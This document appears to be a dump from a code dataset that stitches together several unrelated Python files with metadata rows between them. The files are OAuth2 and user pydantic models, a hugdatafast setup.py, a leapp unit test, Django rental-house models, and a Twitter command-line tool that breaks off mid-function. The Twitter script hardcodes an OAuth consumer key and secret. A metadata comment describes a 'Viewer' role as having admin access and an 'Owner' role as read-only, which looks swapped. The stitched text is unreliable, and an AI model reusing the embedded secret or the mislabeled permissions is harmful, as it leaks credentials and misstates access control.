authorized_subject: str
resource_name: Optional[str] = None
access_level: Optional[AccessLevel] = None
access_token: Optional[AccessToken] = None
# Oauth Specific Code
class OAuth2TokenGrantTypes(str, Enum):
PASSWORD = "password"
REFRESH_TOKEN = "refresh_token"
CLIENT_CREDENTIALS = "client_credentials"
AUTHORIZATION_CODE = "authorization_code"
# TODO: Replaced with pydantic class
# class OAuth2TokenRequestForm:
# """OAuth2 Token Endpoint Request Form."""
# def __init__(
# self,
# grant_type: OAuth2TokenGrantTypes = Form(
# ...,
# description="Grant type. Determines the mechanism used to authorize the creation of the tokens.",
# ),
# username: Optional[str] = Form(
# None, description="Required for `password` grant type. The user’s username."
# ),
# password: Optional[str] = Form(
# None, description="Required for `password` grant type. The user’s password."
# ),
# scope: Optional[str] = Form(
# None,
# description="Scopes that the client wants to be included in the access token. List of space-delimited, case-sensitive strings",
# ),
# client_id: Optional[str] = Form(
# None,
# description="The client identifier issued to the client during the registration process",
# ),
# client_secret: Optional[str] = Form(
# None,
# description=" The client secret. The client MAY omit the parameter if the client secret is an empty string.",
# ),
# code: Optional[str] = Form(
# None,
# description="Required for `authorization_code` grant type. The value is what was returned from the authorization endpoint.",
# ),
# redirect_uri: Optional[str] = Form(
# None,
# description="Required for `authorization_code` grant type. Specifies the callback location where the authorization was sent. This value must match the `redirect_uri` used to generate the original authorization_code.",
# ),
# refresh_token: Optional[str] = Form(
# None,
# description="Required for `refresh_token` grant type. The refresh token previously issued to the client.",
# ),
# state: Optional[str] = Form(
# None,
# description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery.",
# ),
# set_as_cookie: Optional[bool] = Form(
# False,
# description="If `true`, the access (and refresh) token will be set as cookie instead of the response body.",
# ),
# ):
# self.grant_type = grant_type
# self.username = username
# self.password = password
# self.scopes = []
# if scope:
# self.scopes = str(scope).split()
# self.client_id = client_id
# self.client_secret = client_secret
# self.code = code
# self.redirect_uri = redirect_uri
# self.refresh_token = refresh_token
# self.state = state
# self.set_as_cookie = set_as_cookie
@as_form
class OAuth2TokenRequestFormNew(BaseModel):
"""OAuth2 Token Endpoint Request Form."""
grant_type: OAuth2TokenGrantTypes = Field(
...,
description="Grant type. Determines the mechanism used to authorize the creation of the tokens.",
)
username: Optional[str] = Field(
None, description="Required for `password` grant type. The user’s username."
)
password: Optional[str] = Field(
None, description="Required for `password` grant type. The user’s password."
)
scope: Optional[str] = Field(
None,
description="Scopes that the client wants to be included in the access token. List of space-delimited, case-sensitive strings",
)
client_id: Optional[str] = Field(
None,
description="The client identifier issued to the client during the registration process",
)
client_secret: Optional[str] = Field(
None,
description=" The client secret. The client MAY omit the parameter if the client secret is an empty string.",
)
code: Optional[str] = Field(
None,
description="Required for `authorization_code` grant type. The value is what was returned from the authorization endpoint.",
)
redirect_uri: Optional[str] = Field(
None,
description="Required for `authorization_code` grant type. Specifies the callback location where the authorization was sent. This value must match the `redirect_uri` used to generate the original authorization_code.",
)
refresh_token: Optional[str] = Field(
None,
description="Required for `refresh_token` grant type. The refresh token previously issued to the client.",
)
state: Optional[str] = Field(
None,
description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery.",
)
set_as_cookie: Optional[bool] = Field(
False,
description="If `true`, the access (and refresh) token will be set as cookie instead of the response body.",
)
class OAuthToken(BaseModel):
token_type: str = Field(
..., description="The type of token this is, typically just the string `bearer`"
)
access_token: str = Field(..., description="The access token string.")
expires_in: Optional[int] = Field(
None,
description="The expiration time of the access token in seconds.",
)
refresh_token: Optional[str] = Field(
None, description="API token to refresh the sesion token (if it expires)."
)
scope: Optional[str] = Field(
None, description="The scopes contained in the access token."
)
id_token: Optional[str] = Field(
None,
description="OpenID Connect ID Token that encodes the user’s authentication information.",
)
class OAuthTokenIntrospection(BaseModel):
active: bool = Field(
...,
description="Indicator of whether or not the presented token is currently active.",
)
scope: Optional[str] = Field(
None,
description="A space-delimited list of scopes.",
)
client_id: Optional[str] = Field(
None,
description="Client identifier for the OAuth 2.0 client that requested this token.",
)
username: Optional[str] = Field(
None,
description="Human-readable identifier for the resource owner who authorized this token.",
)
token_type: Optional[str] = Field(
None,
description="Type of the token as defined in Section 5.1 of OAuth 2.0 [RFC6749].",
)
exp: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token will expire, as defined in JWT [RFC7519].",
)
iat: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token was originally issued, as defined in JWT [RFC7519].",
)
nbf: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token is not to be used before, as defined in JWT [RFC7519].",
)
sub: Optional[str] = Field(
None,
description="Subject of the token, as defined in JWT [RFC7519]. Usually a machine-readable identifier of the resource owner who authorized this token.",
)
aud: Optional[str] = Field(
None,
description="Service-specific string identifier or list of string identifiers representing the intended audience for this token, as defined in JWT [RFC7519].",
)
iss: Optional[str] = Field(
None,
description="String representing the issuer of this token, as defined in JWT [RFC7519].",
)
jti: Optional[str] = Field(
None,
description="String identifier for the token, as defined in JWT [RFC7519].",
)
uid: Optional[str] = Field(
None,
description="The user ID. This parameter is returned only if the token is an access token and the subject is an end user.",
)
class AuthorizeResponseType(str, Enum):
TOKEN = "token"
CODE = "code"
class OAuth2ErrorDetails(BaseModel):
error: str
class OAuth2Error(HTTPException):
"""Basic exception for OAuth errors.
Implements the [RFC6749 error response](https://tools.ietf.org/html/rfc6749#section-5.2).
"""
def __init__(
self,
error: str,
) -> None:
"""Initializes the exception.
Args:
error: A single ASCII error code from the ones defined in RFC6749.
"""
super(OAuth2Error, self).__init__(
status_code=status.HTTP_400_BAD_REQUEST,
detail=error,
)
# TODO: Not used right now
# class OAuth2AuthorizeRequestForm:
# """OAuth2 Authorize Endpoint Request Form."""
# def __init__(
# self,
# response_type: AuthorizeResponseType = Form(
# ...,
# description="Either code for requesting an authorization code or token for requesting an access token (implicit grant).",
# ),
# client_id: Optional[str] = Form(
# None, description="The public identifier of the client."
# ),
# redirect_uri: Optional[str] = Form(None, description="Redirection URL."),
# scope: Optional[str] = Form(
# None, description="The scope of the access request."
# ),
# state: Optional[str] = Form(
# None,
# description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery",
# ),
# nonce: Optional[str] = Form(None),
# ):
# self.response_type = response_type
# self.client_id = client_id
# self.redirect_uri = redirect_uri
# self.scope = scope
# self.state = state
# self.nonce = nonce
USER_ID_PARAM = Path(
...,
title="User ID",
description="A valid user ID.",
# TODO: add length restriction
)
# User Models
class UserBase(BaseModel):
username: Optional[str] = Field(
None,
example="john-doe",
description="A unique username on the system.",
) # nickname
email: Optional[EmailStr] = Field(
None, example="<EMAIL>", description="User email address."
)
disabled: bool = Field(
False,
description="Indicates that user is disabled. Disabling a user will prevent any access to user-accessible resources.",
)
class UserInput(UserBase):
pass
class UserRegistration(UserInput):
# The password is only part of the user input object and should never returned
# TODO: a password can only be changed when used via oauth password bearer
# TODO: System admin can change passwords for all users
password: Optional[str] = Field(
None,
description="Password for the user. The password will be stored in as a hash.",
)
class User(UserBase):
id: str = Field(
...,
example="16fd2706-8baf-433b-82eb-8c7fada847da",
description="Unique ID of the user.",
)
technical_user: bool = Field(
False,
description="Indicates if the user is a technical user created by the system.",
)
created_at: datetime = Field(
default_factory=lambda: datetime.now(timezone.utc),
description="Timestamp of the user creation. Assigned by the server and read-only.",
)
last_activity: datetime = Field(
None, # If none the validator below will set last_activity to the create_at time
description="Last time the user accessed the system. Right now this is only updated when the user "
"calls the /users/me endpoint so that call should always be done when the user loads the UI.",
)
@pydantic.validator("last_activity", pre=True, always=True)
def default_last_activity(cls, v: datetime, *, values: Dict) -> datetime:
return v if v is not None else values["created_at"]
has_password: bool = Field(
True,
description="Indicates if the user log in with password or SSO",
) | en | 0.700912 | # Map to: select, insert, update, delete # Viewer, view: Allows admin access , Can only view existing resources. Permissions for read-only actions that do not affect state, such as viewing (but not modifying) existing resources or data. # Editor, edit, Contributor : Allows read/write access , Can create and manage all types of resources but can’t grant access to others. All viewer permissions, plus permissions for actions that modify state, such as changing existing resources. # Owner : Allows read-only access. Has full access to all resources including the right to edit IAM, invite users, edit roles. All editor permissions and permissions for the following actions # UNKNOWN = "unknown" # Deny? # return cls.UNKNOWN # For user sessions # DEPLOYMENT_TOKEN = "deployment-token" #read"], # Oauth Specific Code # TODO: Replaced with pydantic class # class OAuth2TokenRequestForm: # """OAuth2 Token Endpoint Request Form.""" # def __init__( # self, # grant_type: OAuth2TokenGrantTypes = Form( # ..., # description="Grant type. Determines the mechanism used to authorize the creation of the tokens.", # ), # username: Optional[str] = Form( # None, description="Required for `password` grant type. The user’s username." # ), # password: Optional[str] = Form( # None, description="Required for `password` grant type. The user’s password." # ), # scope: Optional[str] = Form( # None, # description="Scopes that the client wants to be included in the access token. List of space-delimited, case-sensitive strings", # ), # client_id: Optional[str] = Form( # None, # description="The client identifier issued to the client during the registration process", # ), # client_secret: Optional[str] = Form( # None, # description=" The client secret. The client MAY omit the parameter if the client secret is an empty string.", # ), # code: Optional[str] = Form( # None, # description="Required for `authorization_code` grant type. The value is what was returned from the authorization endpoint.", # ), # redirect_uri: Optional[str] = Form( # None, # description="Required for `authorization_code` grant type. Specifies the callback location where the authorization was sent. This value must match the `redirect_uri` used to generate the original authorization_code.", # ), # refresh_token: Optional[str] = Form( # None, # description="Required for `refresh_token` grant type. The refresh token previously issued to the client.", # ), # state: Optional[str] = Form( # None, # description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery.", # ), # set_as_cookie: Optional[bool] = Form( # False, # description="If `true`, the access (and refresh) token will be set as cookie instead of the response body.", # ), # ): # self.grant_type = grant_type # self.username = username # self.password = password # self.scopes = [] # if scope: # self.scopes = str(scope).split() # self.client_id = client_id # self.client_secret = client_secret # self.code = code # self.redirect_uri = redirect_uri # self.refresh_token = refresh_token # self.state = state # self.set_as_cookie = set_as_cookie OAuth2 Token Endpoint Request Form. Basic exception for OAuth errors. Implements the [RFC6749 error response](https://tools.ietf.org/html/rfc6749#section-5.2). Initializes the exception. Args: error: A single ASCII error code from the ones defined in RFC6749. 
# TODO: Not used right now # class OAuth2AuthorizeRequestForm: # """OAuth2 Authorize Endpoint Request Form.""" # def __init__( # self, # response_type: AuthorizeResponseType = Form( # ..., # description="Either code for requesting an authorization code or token for requesting an access token (implicit grant).", # ), # client_id: Optional[str] = Form( # None, description="The public identifier of the client." # ), # redirect_uri: Optional[str] = Form(None, description="Redirection URL."), # scope: Optional[str] = Form( # None, description="The scope of the access request." # ), # state: Optional[str] = Form( # None, # description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery", # ), # nonce: Optional[str] = Form(None), # ): # self.response_type = response_type # self.client_id = client_id # self.redirect_uri = redirect_uri # self.scope = scope # self.state = state # self.nonce = nonce # TODO: add length restriction # User Models # nickname # The password is only part of the user input object and should never returned # TODO: a password can only be changed when used via oauth password bearer # TODO: System admin can change passwords for all users # If none the validator below will set last_activity to the create_at time | 2.086255 | 2 |
setup.py | richarddwang/hugdatafast | 19 | 8524 | import setuptools
from hugdatafast.__init__ import __version__
with open("README.md", "r") as fh:
long_description = fh.read()
REQUIRED_PKGS = [
'fastai>=2.0.8',
'fastscore>=1.0.1', # change of store_attr api
'datasets',
]
setuptools.setup(
name="hugdatafast",
version=__version__,
author="<NAME>",
author_email="<EMAIL>",
description="The elegant bridge between hugginface data and fastai",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/richarddwang/hugdatafast",
license='Apache 2.0',
packages=setuptools.find_packages(),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
python_requires='>=3.6',
install_requires=REQUIRED_PKGS,
keywords='datasets machine learning datasets metrics fastai huggingface',
) | import setuptools
from hugdatafast.__init__ import __version__
with open("README.md", "r") as fh:
long_description = fh.read()
REQUIRED_PKGS = [
'fastai>=2.0.8',
'fastscore>=1.0.1', # change of store_attr api
'datasets',
]
setuptools.setup(
name="hugdatafast",
version=__version__,
author="<NAME>",
author_email="<EMAIL>",
description="The elegant bridge between hugginface data and fastai",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/richarddwang/hugdatafast",
license='Apache 2.0',
packages=setuptools.find_packages(),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
python_requires='>=3.6',
install_requires=REQUIRED_PKGS,
keywords='datasets machine learning datasets metrics fastai huggingface',
) | en | 0.229856 | # change of store_attr api | 1.294056 | 1 |
tests/scripts/test_repository_actor_definition.py | drehak/leapp | 0 | 8525 | import pytest
from leapp.repository.actor_definition import ActorDefinition, ActorInspectionFailedError, MultipleActorsError
from leapp.exceptions import UnsupportedDefinitionKindError
from leapp.repository import DefinitionKind
from helpers import repository_dir
import logging
import mock
_FAKE_META_DATA = {
'description': 'Fake Description',
'class_name': 'FakeActor',
'name': 'fake-actor',
'path': 'actors/test',
'tags': (),
'consumes': (),
'produces': (),
'dialogs': (),
}
def test_actor_definition(repository_dir):
with repository_dir.as_cwd():
logger = logging.getLogger('leapp.actor.test')
with mock.patch.object(logger, 'log') as log_mock:
definition = ActorDefinition('actors/test', '.', log=log_mock)
for kind in set(DefinitionKind.REPO_WHITELIST + DefinitionKind.ACTOR_WHITELIST):
if kind in DefinitionKind.ACTOR_WHITELIST:
definition.add(kind, '.')
else:
with pytest.raises(UnsupportedDefinitionKindError):
definition.add(kind, '.')
log_mock.error.assert_called_with(
"Attempt to add item type %s to actor that is not supported", kind.name)
log_mock.reset_mock()
with mock.patch('leapp.repository.actor_definition.get_actor_metadata', return_value=_FAKE_META_DATA):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[True]):
definition._module = True
assert definition.consumes == _FAKE_META_DATA['consumes']
assert definition.produces == _FAKE_META_DATA['produces']
assert definition.tags == _FAKE_META_DATA['tags']
assert definition.class_name == _FAKE_META_DATA['class_name']
assert definition.dialogs == _FAKE_META_DATA['dialogs']
assert definition.name == _FAKE_META_DATA['name']
assert definition.description == _FAKE_META_DATA['description']
dumped = definition.dump()
assert dumped.pop('path') == _FAKE_META_DATA['path']
assert dumped.pop('name') == definition.name
assert dumped.pop('files') == ('.',)
assert dumped.pop('libraries') == ('.',)
assert dumped.pop('tests') == ('.',)
assert dumped.pop('tools') == ('.',)
# Assert to ensure we covered all keys
assert not dumped
with pytest.raises(ActorInspectionFailedError):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[]):
definition._discovery = None
definition.discover()
with pytest.raises(ActorInspectionFailedError):
with mock.patch('leapp.repository.actor_definition.get_actors') as mocked_actors:
mocked_actors.side_effect = RuntimeError('Test error')
definition._discovery = None
definition.discover()
with pytest.raises(MultipleActorsError):
with mock.patch('leapp.repository.actor_definition.get_actor_metadata', return_value=_FAKE_META_DATA):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[True, True]):
definition._discovery = None
definition.discover()
| import pytest
from leapp.repository.actor_definition import ActorDefinition, ActorInspectionFailedError, MultipleActorsError
from leapp.exceptions import UnsupportedDefinitionKindError
from leapp.repository import DefinitionKind
from helpers import repository_dir
import logging
import mock
_FAKE_META_DATA = {
'description': 'Fake Description',
'class_name': 'FakeActor',
'name': 'fake-actor',
'path': 'actors/test',
'tags': (),
'consumes': (),
'produces': (),
'dialogs': (),
}
def test_actor_definition(repository_dir):
with repository_dir.as_cwd():
logger = logging.getLogger('leapp.actor.test')
with mock.patch.object(logger, 'log') as log_mock:
definition = ActorDefinition('actors/test', '.', log=log_mock)
for kind in set(DefinitionKind.REPO_WHITELIST + DefinitionKind.ACTOR_WHITELIST):
if kind in DefinitionKind.ACTOR_WHITELIST:
definition.add(kind, '.')
else:
with pytest.raises(UnsupportedDefinitionKindError):
definition.add(kind, '.')
log_mock.error.assert_called_with(
"Attempt to add item type %s to actor that is not supported", kind.name)
log_mock.reset_mock()
with mock.patch('leapp.repository.actor_definition.get_actor_metadata', return_value=_FAKE_META_DATA):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[True]):
definition._module = True
assert definition.consumes == _FAKE_META_DATA['consumes']
assert definition.produces == _FAKE_META_DATA['produces']
assert definition.tags == _FAKE_META_DATA['tags']
assert definition.class_name == _FAKE_META_DATA['class_name']
assert definition.dialogs == _FAKE_META_DATA['dialogs']
assert definition.name == _FAKE_META_DATA['name']
assert definition.description == _FAKE_META_DATA['description']
dumped = definition.dump()
assert dumped.pop('path') == _FAKE_META_DATA['path']
assert dumped.pop('name') == definition.name
assert dumped.pop('files') == ('.',)
assert dumped.pop('libraries') == ('.',)
assert dumped.pop('tests') == ('.',)
assert dumped.pop('tools') == ('.',)
# Assert to ensure we covered all keys
assert not dumped
with pytest.raises(ActorInspectionFailedError):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[]):
definition._discovery = None
definition.discover()
with pytest.raises(ActorInspectionFailedError):
with mock.patch('leapp.repository.actor_definition.get_actors') as mocked_actors:
mocked_actors.side_effect = RuntimeError('Test error')
definition._discovery = None
definition.discover()
with pytest.raises(MultipleActorsError):
with mock.patch('leapp.repository.actor_definition.get_actor_metadata', return_value=_FAKE_META_DATA):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[True, True]):
definition._discovery = None
definition.discover()
| en | 0.882709 | # Assert to ensure we covered all keys | 2.136643 | 2 |
iHome/house/models.py | yeyuning1/iHome | 2 | 8526 | <gh_stars>1-10
from django.db import models
# Create your models here.
from utils.models import BaseModel
class House(BaseModel):
'''房屋信息'''
user = models.ForeignKey('users.User', on_delete=models.CASCADE, verbose_name='房屋用户')
area = models.ForeignKey('address.Area', on_delete=models.SET_NULL, null=True, verbose_name='房屋地区')
title = models.CharField(max_length=64, null=False, verbose_name='房屋标题')
price = models.IntegerField(default=0, verbose_name='房屋单价') # 单价分
address = models.CharField(max_length=512, default='', verbose_name='房屋地址')
room_count = models.SmallIntegerField(default=1, verbose_name='房间数目')
acreage = models.IntegerField(default=0, verbose_name='房屋面积')
unit = models.CharField(max_length=32, default='', verbose_name='房屋单元') # 如几室几厅
capacity = models.SmallIntegerField(default=1, verbose_name='房屋容纳') # 房屋容纳的人数
beds = models.CharField(max_length=64, default='', verbose_name='房屋床铺配置')
deposit = models.IntegerField(default=0, verbose_name='房屋押金')
min_days = models.SmallIntegerField(default=1, verbose_name='最少入住天数')
max_days = models.SmallIntegerField(default=0, verbose_name='最大入住天数') # 0表示不限制
order_count = models.IntegerField(default=0, verbose_name='预计该房屋的订单数')
index_image_url = models.CharField(max_length=500, default='', verbose_name='房屋主图片的路径')
facilities = models.ManyToManyField('Facility')#配套设施
class Meta:
db_table = 'ih_house_info'
verbose_name = '房屋信息'
verbose_name_plural = verbose_name
class Facility(models.Model):
'''房屋设施信息'''
name = models.CharField(max_length=32, verbose_name='设施名称')
class Meta:
db_table = 'ih_facility_info'
verbose_name = '设施信息'
verbose_name_plural = verbose_name
class HouseImage(BaseModel):
'''房屋图片'''
house = models.ForeignKey(House, verbose_name='房屋信息', on_delete=models.CASCADE)
url = models.CharField(max_length=256, null=False, verbose_name='房屋图片地址')
class Meta:
db_table = 'ih_house_image'
verbose_name = '房屋图片'
verbose_name_plural = verbose_name
| from django.db import models
# Create your models here.
from utils.models import BaseModel
class House(BaseModel):
'''房屋信息'''
user = models.ForeignKey('users.User', on_delete=models.CASCADE, verbose_name='房屋用户')
area = models.ForeignKey('address.Area', on_delete=models.SET_NULL, null=True, verbose_name='房屋地区')
title = models.CharField(max_length=64, null=False, verbose_name='房屋标题')
price = models.IntegerField(default=0, verbose_name='房屋单价') # 单价分
address = models.CharField(max_length=512, default='', verbose_name='房屋地址')
room_count = models.SmallIntegerField(default=1, verbose_name='房间数目')
acreage = models.IntegerField(default=0, verbose_name='房屋面积')
unit = models.CharField(max_length=32, default='', verbose_name='房屋单元') # 如几室几厅
capacity = models.SmallIntegerField(default=1, verbose_name='房屋容纳') # 房屋容纳的人数
beds = models.CharField(max_length=64, default='', verbose_name='房屋床铺配置')
deposit = models.IntegerField(default=0, verbose_name='房屋押金')
min_days = models.SmallIntegerField(default=1, verbose_name='最少入住天数')
max_days = models.SmallIntegerField(default=0, verbose_name='最大入住天数') # 0表示不限制
order_count = models.IntegerField(default=0, verbose_name='预计该房屋的订单数')
index_image_url = models.CharField(max_length=500, default='', verbose_name='房屋主图片的路径')
facilities = models.ManyToManyField('Facility')#配套设施
class Meta:
db_table = 'ih_house_info'
verbose_name = '房屋信息'
verbose_name_plural = verbose_name
class Facility(models.Model):
'''房屋设施信息'''
name = models.CharField(max_length=32, verbose_name='设施名称')
class Meta:
db_table = 'ih_facility_info'
verbose_name = '设施信息'
verbose_name_plural = verbose_name
class HouseImage(BaseModel):
'''房屋图片'''
house = models.ForeignKey(House, verbose_name='房屋信息', on_delete=models.CASCADE)
url = models.CharField(max_length=256, null=False, verbose_name='房屋图片地址')
class Meta:
db_table = 'ih_house_image'
verbose_name = '房屋图片'
verbose_name_plural = verbose_name | zh | 0.97096 | # Create your models here. 房屋信息 # 单价分 # 如几室几厅 # 房屋容纳的人数 # 0表示不限制 #配套设施 房屋设施信息 房屋图片 | 2.238565 | 2 |
cltwit/main.py | Psycojoker/cltwit | 0 | 8527 | <filename>cltwit/main.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Cltwit is a command line twitter utility
Author : <NAME>
Date : 2013
"""
import os
import sys
import re
import getopt
import gettext
import sqlite3
import webbrowser
import ConfigParser
from sqlite2csv import sqlite2csv
from cltwitdb import cltwitdb
from utils import LocalTimezone
from cltwitreport import TweetsReport
APP_NAME = 'cltwit'
LOC_PATH = os.path.dirname(__file__) + '/locale'
gettext.find(APP_NAME, LOC_PATH)
gettext.install(APP_NAME, LOC_PATH, True)
try:
import tweepy
except ImportError:
print(_("Veuillez installer tweetpy https://github.com/tweepy/tweepy"))
sys.exit()
# Répertoire pour conf et bdd
__cltwitdir__ = os.path.expanduser("~/.config/cltwit")
# Fichier de configuration
__configfile__ = __cltwitdir__ + "/cltwit.conf"
# base de données et table sqlite
__dblocation__ = __cltwitdir__ + '/data.db'
__tablename__ = 'twitter'
__Local__ = LocalTimezone()
# gestion des couleurs sur le terminal
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
def has_colours(stream):
"""Vérifier la prise en charge des couleurs par le terminal"""
if not hasattr(stream, "isatty"):
return False
if not stream.isatty():
return False # couleurs auto sur un TTY
try:
import curses
curses.setupterm()
return curses.tigetnum("colors") > 2
except:
# Si erreur on suppose false
return False
__has_colours__ = has_colours(sys.stdout)
def printout(text, colour=WHITE):
"""Print en couleur"""
if __has_colours__:
seq = "\x1b[1;%dm" % (30 + colour) + text + "\x1b[0m"
sys.stdout.write(seq)
else:
sys.stdout.write(text.encode("Utf-8"))
def checkdb():
""" Vérifier la présence de la bdd sqlite et la créer si absente """
if (not os.path.exists(__dblocation__)):
printout(_(u"Vous devez d'abord lancer la commande --database create \
pour créer une base de données de vos tweets."), RED)
sys.exit()
def checkconfig():
"""Récupérer la configuration ou la créer"""
# On ouvre le fichier de conf
config = ConfigParser.RawConfigParser()
try:
config.read(__configfile__)
if config.has_option('twitterapi', 'access_token'):
access_token = config.get('twitterapi', 'access_token')
if config.has_option('twitterapi', 'access_password'):
access_password = config.get('twitterapi', 'access_password')
except:
pass
auth = tweepy.OAuthHandler("Jus1rnqM6S0WojJfOH1kQ",
"AHQ5sTC8YYArHilXmqnsstOivY6ygQ2N27L1zBwk")
# Si aucune conf , autorisation de connexion à twitter via OAuth
if not(config.has_option('twitterapi', 'access_token') and
config.has_option('twitterapi', 'access_password')):
# On ouvre le navigateur web pour récupếrer le numéro d'autorisation
while True:
try:
webbrowser.open(auth.get_authorization_url())
var = raw_input(_("Entrez le token !\n"))
auth.get_access_token(var)
except Exception, e:
print(str(e))
continue
break
var = auth.access_token
# On récupère le token et le password
access_password = str(var).split("&")[0].split("=")[1]
access_token = str(var).split("&")[1].split("=")[1]
# écrire le fichier de conf avec les informations récupérées
try:
cfgfile = open(__configfile__, 'w')
if not(config.has_section('twitterapi')):
config.add_section('twitterapi')
config.set('twitterapi', 'access_token', access_token)
config.set('twitterapi', 'access_password', access_password)
config.write(cfgfile)
except IOError:
pass
finally:
cfgfile.close()
else: # Si un fichier de conf existait déjà
auth.set_access_token(access_token, access_password)
return auth
def login():
""" Se connecter à l'api twitter via tweepy """
auth = checkconfig()
api = tweepy.API(auth)
# On vérifie la connexion à l'api en récupérant le user name
try:
twittername = api.me().screen_name
except Exception, e:
if 'Unable to get username' in (str(e)):
printout(_(u"Impossible de s'authentifier avec l'api Twitter.\
Fonctionne en mode déconnecté"), RED)
print("\n")
twittername = "offline_mode"
printout(_(u"Authentifié avec le user twitter {0}").format(twittername.decode('utf-8')), GREEN)
print("\n")
return api, auth, twittername
def get_friends_followers(api):
"""Renvoie la liste des id des friends et followers"""
friend_id = []
follower_id = []
printout(_(u"Récupération des Followers..."), YELLOW)
print("\n")
for follower in tweepy.Cursor(api.followers).items():
follower_id.append(follower.id)
printout((u"Récupération des Friends..."), YELLOW)
print("\n")
for friend in tweepy.Cursor(api.friends).items():
friend_id.append(friend.id)
return friend_id, follower_id
def get_diff(liste1, liste2):
"""Renvoie les objets de liste1 qui ne sont pas dans liste2"""
return list(set(liste1).difference(set(liste2)))
def follow_users(api, user):
"""Suivre une personne"""
try:
api.create_friendship(user)
printout(_(u"Vous suivez maintenant {0}").format(api.get_user(user).screen_name.decode('utf-8')), GREEN)
except Exception, e:
print(e)
def unfollow_user(api, user):
"""Cesser de suivre une personne"""
try:
api.destroy_friendship(user)
printout(_(u"Vous ne suivez plus {0}").format(api.get_user(user).screen_name.decode('utf-8')), GREEN)
except Exception, e:
print(e)
def main(argv=None):
""" Point d'entrée """
# Si le répertoire pour la conf et la base de données n'existe pas le créer
if not os.path.exists(__cltwitdir__):
os.makedirs(__cltwitdir__)
#~ twittername = "offline_mode"
# Traitement des arguments
if argv is None:
argv = sys.argv
if len(argv) == 1:
help()
try:
opts, args = getopt.getopt(sys.argv[1:], "r:ahfut:o:s:d:",
["report", "api", "help", "follow", "unfollow", "tweet=", "output=", "search=", "database="])
except getopt.GetoptError, err:
print(err)
help()
sys.exit()
# traitement des options
for option, value in opts:
if option in ('-a', '--api'):
api, auth, twittername = login()
res = api.rate_limit_status()
rtime = res['reset_time']
rhits = res['remaining_hits']
hlimit = res['hourly_limit']
from dateutil.parser import parse
drtime = parse(rtime)
printout(_("Informations sur l'utilisation de l'api Twitter"), YELLOW)
print("\n")
# Définir l'heure locale qui correspond à l'heure renvoyée
# par l'api Twitter
rlocaltime = drtime.astimezone(__Local__)
printout(_("Maximum d'appels par heure: "), BLUE)
print hlimit
printout(_("Nombre d'appels restants: "), BLUE)
print rhits
printout(_("Heure du prochain reset: "), BLUE)
print rlocaltime.strftime("%H:%M %Y-%m-%d")
if option in ('-r', '--report'):
api, auth, twittername = login()
checkdb()
conn = sqlite3.connect(__dblocation__)
c = conn.cursor()
c.execute("select substr(date, 1,4) from twitter order by date asc limit 1")
dmois = c.fetchone()[0]
c.execute("select substr(date, 1,4) from twitter order by date desc limit 1")
fmois = c.fetchone()[0]
# Requête des données à exporter
dd = dict()
for a in range(int(dmois), int(fmois) + 1):
result = []
for m in range(1, 13):
mois = ('{num:02d}'.format(num=m))
c.execute("select count(*) from twitter where substr(date, 1,4) = '{0}' and substr(date, 6,2) = '{1}'".format(a, mois))
result.append(c.fetchone()[0])
dd[a] = result
c.close()
conn.close()
treport = TweetsReport(value)
# twittername = "offline"
treport.ecrireTitre(twittername)
nb = 0
for annee, donnees in dd.items():
nb += 1
if nb == 4:
treport.NextPage()
nb = 1
saut = 0
if nb == 1:
saut = 0
if nb == 2:
saut = 200
if nb == 3:
saut = 400
treport.ecrireLegende(saut, annee, donnees)
treport.addPie(saut, donnees)
treport.save()
printout(_(u"Report {0} créé !").format(value), GREEN)
print("\n")
sys.exit(0)
if option in ('-d', '--database'):
if value in ('u', 'update'):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Mettre à jour la base de données
db = cltwitdb(__dblocation__, __tablename__)
printout(_(u"Mise à jour de la base de données de {0}").format(twittername.decode('utf-8')), YELLOW)
print("\n")
nb = db.update(api, twittername)
printout(_(u"Ajout de {0} tweet(s) dans la base de données.").format(nb), GREEN)
if value in ('c', 'create'):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Créer la base de données
db = cltwitdb(__dblocation__, __tablename__)
printout(_(u"Création de la liste des tweets de ") + twittername.decode('utf-8'), YELLOW)
db.create(api, twittername)
printout(_(u"Base de données crée"), GREEN)
sys.exit()
#~ database_create(api,twittername)
if option in ("-o", "--output"):
# Exporter en csv
checkdb()
conn = sqlite3.connect(__dblocation__)
c = conn.cursor()
# Requête des données à exporter
c.execute('select date, tweet, url from {0} order by date desc'.format(__tablename__))
# On appelle la classe sqlite2csv qui se charge de l'export
export = sqlite2csv(open(value, "wb"))
# Entête du fichier csv
export.writerow(["Date", "Tweet", "URL"])
# Lignes du fichier csv
export.writerows(c)
# On ferme la connexion sqlite et le curseur
c.close()
conn.close()
printout(_(u"Fichier csv {0} créé.").format(value.decode('utf-8')), GREEN)
sys.exit()
